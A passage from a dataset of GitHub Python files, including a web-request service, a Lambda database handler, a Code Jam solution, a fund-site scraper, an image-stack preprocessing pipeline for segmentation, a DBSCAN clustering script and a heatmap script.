'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',\r\n\t\t'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n\t\t'Accept-Encoding': 'gzip, deflate, sdch',\r\n\t\t'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',\r\n\t}\r\n\tdef __init__(self):\r\n\t\tsuper(NetworkService, self).__init__()\r\n\t\tself.session = None\r\n\t\tself.cur_proxies = None\r\n\r\n\tdef _update_session(self, proxies):\r\n\t\t#if proxies != self.cur_proxies:\r\n\t\tif self.session:\r\n\t\t\tself.session.close()\r\n\t\t\tself.session = None\r\n\t\tif 
not self.session:\r\n\t\t\tself.session = session = requests.Session()\r\n\t\t\tsession.headers.update(self.DEFAULT_HEADER)\r\n\t\t\tsession.keep_alive = False\r\n\t\t\tself.cur_proxies = proxies\r\n\t\t#requests.adapters.DEFAULT_RETRIES = 5\r\n\r\n\tdef clear(self):\r\n\t\tif self.session:\r\n\t\t\tself.session.close()\r\n\t\t\tself.session = None\r\n\t\tself.cur_proxies = None\r\n\r\n\tdef send_request(self, request, **kwargs):\r\n\t\tlogging.info('Requesting {}'.format(request))\r\n\t\tself._update_session(kwargs.get('proxies'))\r\n\r\n\t\tif request.method == 'post':\r\n\t\t\tr = self.session.post(request.url, request.data, **kwargs)\r\n\t\telif request.method == 'get':\r\n\t\t\tr = self.session.get(request.url, **kwargs)\r\n\t\telse:\r\n\t\t\traise NotImplementedError()\r\n\t\treturn Response(body=r.content, url=r.url, status=r.status_code, meta=request.meta)\r\n\r\n\r\n\r\n","repo_name":"c0nnyr/MrSpider","sub_path":"NetworkService.py","file_name":"NetworkService.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30137908801","text":"import json\nimport logging\nimport os\n\nimport records\nfrom sqlalchemy import text\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nshmenkins_db_url = os.environ[\"DB_URL\"]\n\ndb = records.Database(shmenkins_db_url)\n\n\ndef run(event, context):\n logger.info(f\"start; event={event}\")\n\n try:\n body = json.loads(event[\"body\"])\n url = body[\"url\"]\n except Exception as e:\n logger.error(e)\n return {\"statusCode\": 400, \"body\": \"Bad Request\"}\n\n try:\n with db.transaction():\n cursor = db.db.execute(text(\"insert into scm_repo(url) values(:url)\"), url=url)\n body[\"id\"] = cursor.lastrowid\n response_body = json.dumps(body)\n except Exception as e:\n logger.error(e)\n return {\"statusCode\": 500, \"body\": \"Internal server error\"}\n\n logger.info(f\"finish; id={body['id']}\")\n return {\"statusCode\": 201, \"body\": response_body}\n","repo_name":"rzhilkibaev/shmenkins2","sub_path":"src/shmenkins2/PostScmRepo.py","file_name":"PostScmRepo.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23567540881","text":"from math import floor, log2\r\nfrom collections import defaultdict\r\n\r\nwith open(\"C-small-2-attempt1.in\", \"r\") as inp:\r\n with open(\"C-small-2-attempt1.out\", \"w\") as outp:\r\n cases = int(inp.readline().strip())\r\n for i in range(cases):\r\n stalls, people = [int(k) for k in inp.readline().split()]\r\n obj_level = floor(log2(people)) + 1\r\n stalls_count = defaultdict(int)\r\n stalls_count[stalls] = 1\r\n tuples_count = defaultdict(int)\r\n for j in range(obj_level):\r\n stalls_count_bis = defaultdict(int)\r\n for stalls, count in stalls_count.items():\r\n if stalls % 2 == 0:\r\n stalls_count_bis[stalls/2] += count\r\n stalls_count_bis[stalls/2 - 1] += count\r\n if j == obj_level-1:\r\n tuples_count[(stalls/2, stalls/2 - 1)] += count\r\n else:\r\n k = floor(stalls/2)\r\n stalls_count_bis[k] += 2*count\r\n if j == obj_level-1:\r\n tuples_count[(k, k)] += count\r\n stalls_count = stalls_count_bis\r\n order = people - 2**(obj_level-1) + 1\r\n tup_c_list = list(tuples_count.items())\r\n tup_c_list = sorted(tup_c_list, key=lambda x: x[0][0]+x[0][1],\r\n reverse=True)\r\n if order <= tup_c_list[0][1]:\r\n outp.write(\"Case #\" + str(i+1) + \": \" +\r\n 
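# NetworkService.py above closes and rebuilds its requests.Session on every request,
# which forfeits connection pooling. A sketch of the usual alternative, one Session
# configured once with default headers plus transport-level retries (standard
# requests/urllib3 APIs; the header value is a placeholder):
import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

def make_session(headers=None, retries=3):
    session = requests.Session()
    session.headers.update(headers or {"User-Agent": "example-client/1.0"})
    adapter = HTTPAdapter(max_retries=Retry(total=retries, backoff_factor=0.5))
    session.mount("http://", adapter)     # pooled, retrying connections for both
    session.mount("https://", adapter)    # schemes, reused across requests
    return session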
str(int(tup_c_list[0][0][0])) + \" \" +\r\n str(int(tup_c_list[0][0][1])) + \"\\n\")\r\n elif order <= tup_c_list[0][1] + tup_c_list[1][1]:\r\n outp.write(\"Case #\" + str(i+1) + \": \" +\r\n str(int(tup_c_list[1][0][0])) + \" \" +\r\n str(int(tup_c_list[1][0][1])) + \"\\n\")\r\n else:\r\n outp.write(\"Case #\" + str(i+1) + \": \" +\r\n str(int(tup_c_list[2][0][0])) + \" \" +\r\n str(int(tup_c_list[2][0][1])) + \"\\n\")\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1503.py","file_name":"1503.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24943045485","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nimport re\n\n\ndef get_html(page):\n '''获取html'''\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding':'gzip, deflate',\n 'Accept-Language':'zh-CN,zh;q=0.9',\n 'Cache-Control':'max-age=0',\n 'Connection': 'keep-alive',\n 'Content-Type':'application/x-www-form-urlencoded',\n 'Upgrade-Insecure-Requests':'1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36',\n 'Referer':'http://cx.cnca.cn/'\n }\n\n url=\"https://neris.csrc.gov.cn/alappl/home/gongshi2.do?pageNo={}\".format(page)\n strhtml = requests.get(url,headers=headers,verify=False)\n return strhtml.text\n\ndef parse_one_page():\n html=get_html(page=101)\n soup = bs(html, 'lxml')\n title = soup.select('.titleshow')\n for i in title:\n if '嘉实' in i.text:\n print(i.text)\n # a=re.findall('嘉实基金',html)\n # b=re.match()\n # print(title)\n\n\nif __name__ == '__main__':\n parse_one_page()","repo_name":"SmasterZheng/leetcode","sub_path":"算法题/4.爬虫基金.py","file_name":"4.爬虫基金.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13920708612","text":"import os\r\nimport pandas as pd\r\nimport cv2\r\nimport shutil\r\nimport argschema as ags\r\nimport natsort\r\nimport numpy as np\r\nfrom tifffile import imsave, imread\r\nimport psutil\r\n\r\nclass InputSchema(ags.ArgSchema):\r\n\r\n specimen_id = ags.fields.Str(description='specimen id')\r\n raw_single_tif_dir = ags.fields.InputDir(description=\"A directory with individual tif files (z-slices)\")\r\n specimen_dir = ags.fields.InputDir(default=None,description=\"Directory for specimen output files. If none, use basedir of raw_single_tif_dir\")\r\n invert_image_color = ags.fields.Boolean(default=True,description=\"Neural network will expect inverted (black background) images\")\r\n\r\ndef stack_into_chunks(chunk_size,raw_single_tif_dir,chunk_dir,ids):\r\n \"\"\"\r\n Will stack a directory of single tif images into one 3d volume tif image. Assumes the stacks are named in\r\n chronological order.\r\n\r\n :param chunk_size: integer. 
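# The Code Jam record above ("Bathroom Stalls") expands per-level tuples; the
# editorial technique splits segment *counts* instead, handling huge K in O(log K)
# generations. A compact sketch of that idea, not the submission itself:
from collections import Counter

def last_person_gap(n_stalls, k_people):
    """Return (max_side, min_side) around the stall the k-th person takes."""
    segments = Counter({n_stalls: 1})
    remaining = k_people
    while True:
        size = max(segments)              # people always occupy a largest segment
        count = segments.pop(size)
        if remaining <= count:
            return size // 2, (size - 1) // 2
        remaining -= count                # that whole generation fills up at once
        segments[size // 2] += count
        segments[(size - 1) // 2] += count

assert last_person_gap(1000, 1) == (500, 499)
assert last_person_gap(1000, 1000) == (0, 0)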
number of tif slices per 3d chunk\r\n :param raw_single_tif_dir: input directory that has the individual slices of tif images\r\n :param chunk_dir: where to save the 3d tif files\r\n :param ids: specimen id\r\n :return:\r\n \"\"\"\r\n\r\n chunk_n = 0\r\n counter = 0\r\n cv_stack = []\r\n list_of_files = [ii for ii in natsort.natsorted(os.listdir(raw_single_tif_dir)) if '.tif' in ii]\r\n # print('{} Stacking slices into 3D tif chunks'.format(ids))\r\n for files in list_of_files:\r\n counter+=1\r\n # print(files,counter)\r\n img = cv2.imread(os.path.join(raw_single_tif_dir,files),cv2.IMREAD_UNCHANGED)\r\n cv_stack.append(img)\r\n if counter == chunk_size:\r\n chunk_n+=1\r\n cv_stack = np.asarray(cv_stack)\r\n imsave(os.path.join(chunk_dir,'chunk{}.tif'.format(chunk_n)),cv_stack)\r\n cv_stack = []\r\n counter = 0\r\n #if the number of single tif files was a multiple of the chunk_size (usually unlikely)\r\n if (float(len(list_of_files))/float(chunk_size)).is_integer():\r\n print('{} files, {} chunk size'.format(len(list_of_files),chunk_size))\r\n print('The Last Chunk was a multiple of {}'.format(chunk_size))\r\n #otherwise make one last chunk that has overlap so that we ensure all 3d chunks have cnosistent z-dimension\r\n else:\r\n chunk_n+=1\r\n last_counter = 0\r\n last_cv_stack = []\r\n for files in list_of_files[-chunk_size:]:\r\n last_counter+=1\r\n last_img = cv2.imread(os.path.join(raw_single_tif_dir,files),cv2.IMREAD_UNCHANGED)\r\n last_cv_stack.append(last_img)\r\n if last_counter == chunk_size:\r\n last_cv_stack = np.asarray(last_cv_stack)\r\n imsave(os.path.join(chunk_dir,'chunk{}.tif'.format(chunk_n)),last_cv_stack)\r\n\r\n\r\ndef check_for_size_limit(chunk_dir):\r\n \"\"\"\r\n Will check and see if any of the file sizes in the input directory are greater than the available memory.\r\n If so a warning meessage will be printed to standard output\r\n\r\n :param chunk_dir: Input directory\r\n :return:\r\n \"\"\"\r\n memory_dict = dict(psutil.virtual_memory()._asdict())\r\n available_memory = memory_dict['available']\r\n\r\n for tif_stacks in [f for f in os.listdir(chunk_dir) if '.tif' in f]:\r\n tif_stack_image = os.path.join(chunk_dir,tif_stacks)\r\n tif_stack_size = os.path.getsize(tif_stack_image)\r\n\r\n if tif_stack_size > available_memory:\r\n print(\"WARNING: File {} is {} bytes. Your machine has {} bytes of available memory.\".format(tif_stack_image,tif_stack_size,available_memory))\r\n print(\"This may lead to crashing\")\r\n # sys.exit()\r\n\r\n\r\ndef myround64(x, base=64):\r\n return base * int(x/base)\r\n\r\ndef myround16(x,base=16):\r\n return base*int(x/base)\r\n\r\ndef process_specimen(ids,specimen_dir,raw_single_tif_dir,invert_image_color):\r\n \"\"\"\r\n Worker function for script that will do a number of pre-processing steps. Mostly focused on putting the input images\r\n into a format (dimensions and color inversion) the neural network will be compatible with. The network was trained with\r\n a patch size of 64x64x32 so we need to get images into nxmx32 dimension where n and m are nearest multiple of 64.\r\n\r\n This script expects an input directory of single tif images (not 3d tif volumes) named in naturally ascending\r\n order (i.e. 1.tif, 2.tif, 3.tif...) 
and will run the following:\r\n\r\n -- Get crop dimensions so input images are compatible with neural_network patch size\r\n -- Crop the images\r\n -- Stack the slices into chunks of 32 (check for memory limit)\r\n -- If number of slices is not a multiple of 32, there will be overlap in segmentation that is accounted for\r\n in ImageStack_To_Segmentation.py\r\n -- If memory limit is exceeded try splitting images into left and right (TODO update this to dynamically split in\r\n scenarios where left and right split still exceeds memory)\r\n -- Create raw input max intensity projections\r\n\r\n :param ids: specimen id\r\n :param specimen_dir: root directory for specimen\r\n :param raw_single_tif_dir: input directory of single tif images\r\n :param invert_image_color: boolean to invert images or not\r\n :return:\r\n \"\"\"\r\n\r\n error_list = []\r\n\r\n #Step 0. Define the chunk size for step 7\r\n chunk_size = 32\r\n\r\n #Step 1 was removed because it was not useful for consumers outside AIBS\r\n\r\n #Step 2. Choses last file in list of tif files and extracts crop dimensions\r\n try:\r\n list_of_files = os.listdir(raw_single_tif_dir)\r\n for files in list_of_files:\r\n if files.endswith('.tif'):\r\n filename_to_extract_crop_info = files\r\n\r\n # print('finding crop dimensions for {}'.format(ids))\r\n uncropped_img = cv2.imread(os.path.join(raw_single_tif_dir,filename_to_extract_crop_info),cv2.IMREAD_UNCHANGED)\r\n\r\n height, width = uncropped_img.shape\r\n\r\n height_nearest_mult_below = myround64(height)\r\n width_nearest_mult_below = myround64(width)\r\n\r\n x1,y1 = 0,0\r\n x2,y2 = width_nearest_mult_below,height_nearest_mult_below\r\n\r\n assert ((y2-y1)/64).is_integer() & ((x2-x1)/64).is_integer()\r\n\r\n except:\r\n print('{} coordinates for x-y crop are not divisible by 64'.format(ids))\r\n error_list.append('{} Step 2'.format(ids))\r\n\r\n\r\n #Step 3. Crop and invert each image\r\n try:\r\n for f in os.listdir(raw_single_tif_dir):\r\n if f.endswith('.tif'):\r\n img = cv2.imread(os.path.join(raw_single_tif_dir,f),cv2.IMREAD_UNCHANGED)\r\n cropped_img = img[y1:y2,x1:x2]\r\n\r\n if invert_image_color:\r\n cropped_img_inverted = 255 - cropped_img\r\n cv2.imwrite(os.path.join(raw_single_tif_dir,f), cropped_img_inverted)\r\n else:\r\n cv2.imwrite(os.path.join(raw_single_tif_dir, f), cropped_img)\r\n\r\n except:\r\n print('Unable to crop and invert images for {}'.format(ids))\r\n error_list.append('{} Step 3'.format(ids))\r\n\r\n\r\n\r\n #Step 4+5. Get list of tif files in subjects directory\r\n #Get an image x and y dimensions for bounding box\r\n try:\r\n # print('step 4')\r\n list_of_files = natsort.natsorted(os.listdir(raw_single_tif_dir))\r\n list_of_files = [f for f in list_of_files if '.tif' in f]\r\n\r\n # print('step 5')\r\n img_for_shape = cv2.imread(os.path.join(raw_single_tif_dir,list_of_files[1]),cv2.IMREAD_UNCHANGED)\r\n inverted_height, inverted_width = img_for_shape.shape\r\n print(inverted_height,inverted_width)\r\n except:\r\n print('Unable to crop and invert images for {}'.format(ids))\r\n error_list.append('{} Steps 4/5'.format(ids))\r\n\r\n\r\n #step 6. make outdir for 3d chunks\r\n # print('step 6')\r\n if os.path.isdir(os.path.join(specimen_dir,'Chunks_of_{}'.format(chunk_size))):\r\n chunk_dir = os.path.join(specimen_dir,'Chunks_of_{}'.format(chunk_size))\r\n else:\r\n os.mkdir(os.path.join(specimen_dir,'Chunks_of_{}'.format(chunk_size)))\r\n chunk_dir = os.path.join(specimen_dir,'Chunks_of_{}'.format(chunk_size))\r\n\r\n #Step 7. 
Make each segment of (chunk_size) tif images into one 3d chunk\r\n try:\r\n stack_into_chunks(chunk_size,raw_single_tif_dir,chunk_dir,ids)\r\n chunk_err = None\r\n left_and_right = False\r\n\r\n except ValueError:\r\n #This will fail with a memory error. I.E. you were trying to make 3D chunks, larger than the amount of RAM available\r\n\r\n chunk_err = 1\r\n print('Error Generating Chunk Tiffs for {}'.format(ids))\r\n print(\"Will try splitting images in half\")\r\n error_list.append('{} Value Error @ Step 7'.format(ids))\r\n left_and_right = True\r\n #Step 7.1 Delete 32 chunks directory and Make new directories for left and right\r\n try:\r\n shutil.rmtree(chunk_dir)\r\n\r\n #Make left and right directories\r\n raw_single_tif_dir_left = os.path.join(specimen_dir, 'Single_Tif_Images_Left')\r\n raw_single_tif_dir_right = os.path.join(specimen_dir,'Single_Tif_Images_Right')\r\n chunk_dir_left = os.path.join(specimen_dir,'Chunks_of_{}_Left'.format(chunk_size))\r\n chunk_dir_right = os.path.join(specimen_dir,'Chunks_of_{}_Right'.format(chunk_size))\r\n list_to_check = [raw_single_tif_dir_left,raw_single_tif_dir_right,chunk_dir_left,chunk_dir_right]\r\n for d in list_to_check:\r\n if not os.path.exists(d):\r\n os.mkdir(d)\r\n\r\n except:\r\n print('Error Generating Left Right Dirs for {}'.format(ids))\r\n error_list.append('{} Step 7.1'.format(ids))\r\n\r\n\r\n #Step 7.2 Check that when we divide by two (in half) we make two images with x-dim still a multiple of 64\r\n try:\r\n\r\n #Need to keep the x dimension of left and right tif files multiples of 64. This is only true if the width is\r\n # an EVEN multiple of 64\r\n #For example: lets say in step 3 we cropped the image to 6,464 (i.e. 64*101). Splitting this in half\r\n #will give 3,232 and 3,232 x-pixels in each left and right image. 
3,232 is no longer a multiple of 64.\r\n #To solve this just use myround64 to find the closest 64x index and use that\r\n\r\n # print('Width/2 div 64 = {}'.format((inverted_width/2)/64))\r\n if ((int(inverted_width)/2)/64).is_integer():\r\n half_way_crop = int((inverted_width)/2)\r\n\r\n else:\r\n # print('NEED TO REINDEX FOR 64X')\r\n half_way_crop = int(myround64(inverted_width/2))\r\n\r\n #Loop through all individual tiffs and divide them\r\n for inverted_cropped_img in [tif_file for tif_file in natsort.natsorted(os.listdir(raw_single_tif_dir)) if '.tif' in tif_file]:\r\n processed_img_path = os.path.join(raw_single_tif_dir,inverted_cropped_img)\r\n processed_img = cv2.imread(processed_img_path,cv2.IMREAD_UNCHANGED)\r\n\r\n left_half = processed_img[0:int(inverted_height) , 0:half_way_crop]\r\n right_half = processed_img[0:int(inverted_height) , half_way_crop:int(inverted_width)]\r\n\r\n cv2.imwrite(os.path.join(raw_single_tif_dir_left,'Left_'+inverted_cropped_img), left_half)\r\n cv2.imwrite(os.path.join(raw_single_tif_dir_right,'Right_'+inverted_cropped_img), right_half)\r\n\r\n left_width = left_half.shape[1]\r\n right_width = right_half.shape[1]\r\n except:\r\n print('Error dividing tiffs into Left and Right images for {}'.format(ids))\r\n error_list.append('{} Step 7.2'.format(ids))\r\n\r\n #Step 7.3 Make Left and Right Chunks of 32\r\n try:\r\n #Now we can make our left and right chunks of 32\r\n # print('Making left and right chunks')\r\n stack_into_chunks(chunk_size,raw_single_tif_dir_left,chunk_dir_left,ids)\r\n stack_into_chunks(chunk_size,raw_single_tif_dir_right,chunk_dir_right,ids)\r\n except:\r\n print('Error Generating Left and Right Chunk Tiffs for {}'.format(ids))\r\n error_list.append('{} Step 7.3'.format(str(ids)))\r\n\r\n #Steps 8 and 9\r\n if chunk_err:\r\n\r\n #Step 8. Check the sizes of each chunk generated from step 7\r\n # print('step 8 chunk error')\r\n for chunky_directory in [chunk_dir_left,chunk_dir_right]:\r\n try:\r\n check_for_size_limit(chunky_directory)\r\n except:\r\n print('At least one of {} tif stacks exceeds 5Gb'.format(ids))\r\n error_list.append('{} Step 8'.format(ids))\r\n\r\n #Step 9. write bounding box for each side (0 0 0 y x chunk_size)\r\n try:\r\n bound_box_left = [0,0,0,left_width,inverted_height,chunk_size]\r\n bb_dir_L = os.path.join(specimen_dir,'bbox_{}_Left.csv'.format(ids))\r\n pd.DataFrame({'bound_boxing':bound_box_left}).to_csv(bb_dir_L.format(ids))\r\n\r\n bound_box_right = [0,0,0,right_width,inverted_height,chunk_size]\r\n bb_dir_R = os.path.join(specimen_dir,'bbox_{}_Right.csv'.format(ids))\r\n pd.DataFrame({'bound_boxing':bound_box_right}).to_csv(bb_dir_R.format(ids))\r\n\r\n except:\r\n print('Unable to make bounding box for {}'.format(ids))\r\n error_list.append('{} Step 9'.format(ids))\r\n\r\n else:\r\n #Step 8. Check the sizes of each chunk generated from step 7\r\n # print('step 8 no chunk error')\r\n check_for_size_limit(chunk_dir)\r\n\r\n #Step 9. 
Generate The Bounding Box File (0 0 0 y x chunk_size)\r\n try:\r\n # print('bounding box step')\r\n bound_box = [0,0,0,inverted_width,inverted_height,chunk_size]\r\n bb_dir = os.path.join(specimen_dir,'bbox_{}.csv'.format(ids))\r\n pd.DataFrame({'bound_boxing':bound_box}).to_csv(bb_dir.format(ids))\r\n except:\r\n print('Unable to make bounding box for {}'.format(ids))\r\n error_list.append('{} Step 9'.format(ids))\r\n\r\n #make mip for single tiff files dir and then delete those dirs\r\n if left_and_right == True:\r\n raw_single_tif_dir_right = os.path.join(specimen_dir,'Single_Tif_Images_Right')\r\n mip_ofile_right = os.path.join(specimen_dir,'Single_Tif_Images_Right_Mip.tif')\r\n\r\n raw_single_tif_dir_left = os.path.join(specimen_dir,'Single_Tif_Images_Left')\r\n mip_ofile_left = os.path.join(specimen_dir,'Single_Tif_Images_Left_Mip.tif')\r\n\r\n dir_to_mip(indir = raw_single_tif_dir_right, ofile = mip_ofile_right )\r\n dir_to_mip(indir = raw_single_tif_dir_left, ofile = mip_ofile_left )\r\n\r\n else:\r\n mip_ofile = os.path.join(specimen_dir,\"Single_Tif_Images_Mip.tif\")\r\n dir_to_mip(indir=raw_single_tif_dir, ofile = mip_ofile)\r\n\r\n return error_list\r\n\r\ndef dir_to_mip(indir,ofile,mip_axis=2):\r\n \"\"\"\r\n From a directory of single tif files, will create a maximum intensity projection (mip) along certain axis\r\n example: if mip_axis=2 creates xy mip\r\n \"\"\"\r\n\r\n indir_files = os.listdir(indir)\r\n img_0_pth = os.path.join(indir,indir_files[0])\r\n img_0 = cv2.imread(img_0_pth,cv2.IMREAD_UNCHANGED)\r\n data_type = img_0.dtype\r\n # print(img_0.shape,len(indir_files))\r\n\r\n full_img = np.zeros((img_0.shape[0],img_0.shape[1],len(indir_files)))\r\n ct=-1\r\n for fn in indir_files:\r\n ct+=1\r\n pth = os.path.join(indir,fn)\r\n img = cv2.imread(pth,cv2.IMREAD_UNCHANGED)\r\n full_img[:,:,ct] = img\r\n\r\n mip_z_axis = np.max(full_img, axis=mip_axis).astype(data_type)\r\n imsave(ofile,mip_z_axis)\r\n\r\n\r\ndef main(specimen_id, raw_single_tif_dir, specimen_dir, invert_image_color, **kwargs):\r\n\r\n if not specimen_dir:\r\n specimen_dir = os.path.dirname(raw_single_tif_dir)\r\n\r\n returned_error_list = process_specimen(specimen_id,specimen_dir, raw_single_tif_dir, invert_image_color)\r\n if returned_error_list!=[]:\r\n print(\"error occured in preprocessing:\")\r\n print(returned_error_list)\r\n\r\n else:\r\n print(\"Image Preprocessing Completed Without Error\")\r\n\r\nif __name__ == \"__main__\":\r\n\tmodule = ags.ArgSchemaParser(schema_type=InputSchema)\r\n\tmain(**module.args)\r\n","repo_name":"ogliko/patchseq-autorecon","sub_path":"pipeline/PreProcess_ImageStack.py","file_name":"PreProcess_ImageStack.py","file_ext":"py","file_size_in_byte":16222,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"39552817463","text":"import sys\nimport pandas as pd\nfrom enum import Enum, auto\nfrom collections import deque\n\nclass Label(Enum):\n UNASSIGN = auto()\n ASSIGN = auto()\n NOISE = auto()\n\n\nclass PointObj():\n def __init__(self, p):\n self.oid = p[1]\n self.x = p[2]\n self.y = p[3]\n self.label = Label.UNASSIGN\n \n def _dist(self, q): # euclidean distance with point p\n return ((self.x - q.x) ** 2 + (self.y - q.y) ** 2) ** 0.5\n \n def scanNeighbors(self, X, eps):\n neighbors = []\n for q in X:\n if q != self and self._dist(q) <= eps:\n neighbors.append(q)\n\n return neighbors\n \n def pushCluster(self, clusterSet, k):\n self.label = Label.ASSIGN\n if k in clusterSet:\n clusterSet[k].append(self.oid)\n 
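# stack_into_chunks in PreProcess_ImageStack.py above re-reads the final chunk_size
# slices so every saved volume keeps the same z-depth. The same split is easier to
# verify on an in-memory array; a sketch assuming the slices fit in RAM:
import numpy as np

def split_with_overlap(stack, depth=32):
    """Yield (start, chunk) views of shape (depth, H, W) covering the whole stack."""
    n = stack.shape[0]
    assert n >= depth, "need at least one full chunk"
    starts = list(range(0, n - depth + 1, depth))
    if starts[-1] + depth < n:            # leftover tail: one overlapping chunk
        starts.append(n - depth)
    for s in starts:
        yield s, stack[s:s + depth]

# A 70-slice stack yields chunks at z = 0, 32 and 38; the final chunk overlaps by
# design, mirroring the overlap the segmentation step later has to deduplicate.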
else:\n clusterSet[k] = [self.oid]\n\ndef dbscan(X, eps, minpts, clusterSet):\n k = -1\n for p in X:\n if p.label == Label.UNASSIGN: # no visited\n neighbors = p.scanNeighbors(X, eps) # get neighbors in eps\n \n if len(neighbors) >= minpts: # this point is core\n k += 1\n p.pushCluster(clusterSet, k)\n \n queue = deque(neighbors)\n while queue:\n n = queue.popleft()\n\n if n.label != Label.ASSIGN:\n n.pushCluster(clusterSet, k)\n \n neighbors = n.scanNeighbors(X, eps)\n if len(neighbors) >= minpts: # this neighbor is also core\n queue.extend(neighbors)\n else:\n p.label = Label.NOISE\n\n\n\n\nif __name__ == '__main__':\n # command line arguments\n input_file_name = sys.argv[1]\n n = int(sys.argv[2])\n Eps = int(sys.argv[3])\n MinPts = int(sys.argv[4])\n\n # open files\n input_file = pd.read_csv('./data-3/' + input_file_name, '\\t', header=None, names=['object_id', 'x', 'y'])\n\n X = [PointObj(item) for item in input_file.itertuples()]\n clusterSet = {}\n dbscan(X, Eps, MinPts, clusterSet)\n\n clusters = sorted(clusterSet.values(), key=lambda x:len(x))\n while len(clusters) > n:\n del clusters[0]\n\n for i in range(n):\n fn = input_file_name.rstrip('.txt')\n pd.DataFrame(sorted(clusters[i])).to_csv(f'{fn}_cluster_{i}.txt', header=False, index=False)\n\n\n","repo_name":"be-simon/Data_Science_HYU_ITE4005","sub_path":"assignment3/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3883186125","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 17 00:41:19 2020\n\n@author: GEETHA RAJU\n\"\"\"\n\nimport pandas as pd\nimport csv\nimport numpy as np\nfrom numpy import genfromtxt\n\nfile = \"D:/Geetha/Python_WS/Spyder_WS/Thesis_Evaluation/Clear_HeatMap_Health.csv\"\n\nEntityList = [\"ORG\", \"GPE\", \"PERSON\",\t\"DATE\",\"TIME\", \"NORP\",\t\"LOCATION\", \"PRODUCT\", \"EVENTS\", \"PERCENT\", \"ORG-GPE\"\n \"ORG-PERSON\",\t\"ORG-DATE\",\t\"ORG-TIME\", \"ORG-NORP\", \"ORG-LOCATION\",\t\"ORG-PRODUCT\",\t\"ORG-EVENTS\",\t\"ORG-PERCENT\",\t\"GPE-PERSON\"\t\"GPE-DATE\",\n \"GPE-TIME\",\t\"GPE-NORP\",\t\"GPE-LOCATION\",\t\"GPE-PRODUCT\",\t\"GPE-EVENTS\",\t\"GPE-PERCENT\",\t\"PERSON-DATE\",\t\"PERSON-TIME\",\t\"PERSON-NOPR\",\n \"PERSON-LOCATION\",\t\"PERSON-PRODUCT\",\t\"PERSON-EVENTS\",\t\"PERSON-PERCENT\",\"DATE-TIME\t\",\"DATE-NORP\",\t\"DATE-LOCATION\",\"DATE-PRODUCT\",\t\"DATE-EVENTS\",\n \"DATE-PERCENT\",\t\"TIME-NOPR\",\t\"TIME-LOCATION\",\t\"TIME-PRODUCT\",\t\"TIME-EVENTS\",\t\"TIME-PERCENT\",\t\"NORP-LOCATION\",\t\"NORP-PRODUCT\",\t\"NORP-EVENTS\",\t\"NORP-PERCENT\",\n \"LOCATION-PRODUCT\",\t\"LOCATION-EVENT\", \"LOCATION-PERCENT\",\t\"PRODUCT-EVENTS\",\t \"PRODUCT-PERCENT\",\t\"EVENTS-PERCENT\"]\n\ndata = pd.read_csv(file) \ndata = data.fillna(0)\n\n\nmy_data = genfromtxt(file, delimiter=',')\n\nmy_data_clean = np.nan_to_num(my_data) \nresult = np.where(my_data_clean !=0)\n#result = np.where(my_data_clean<0 )\nprint('Tuple of arrays returned : ', result) \nlistOfCoordinates= list(zip(result[0], result[1])) \n\n\ndef unique(list1): \n \n # intilize a null list \n unique_list = [] \n \n # traverse for all elements \n for x in list1: \n # check if exists in unique_list or not \n if x not in unique_list: \n unique_list.append(x)\n \n return unique_list\n\nindex_1 = unique(result[0])\nindex_2 = unique(result[1])\n\ndata.head()\n\n#def getEntities(data, index_1, index_2):\n# print(\"index1:\")\n# for i in index_1:\n## print(i)\n# 
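# The hand-rolled DBSCAN in clustering.py above scans every point per neighbour
# query, so it is O(n^2). As a cross-check, scikit-learn's DBSCAN produces the same
# partition (up to cluster numbering; -1 marks noise) with a spatial index inside:
import numpy as np
from sklearn.cluster import DBSCAN

points = np.array([[0, 0], [0, 1], [1, 0], [10, 10], [10, 11], [50, 50]])
labels = DBSCAN(eps=2.0, min_samples=2).fit_predict(points)
print(labels)        # [ 0  0  0  1  1 -1]: two clusters plus one noise point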
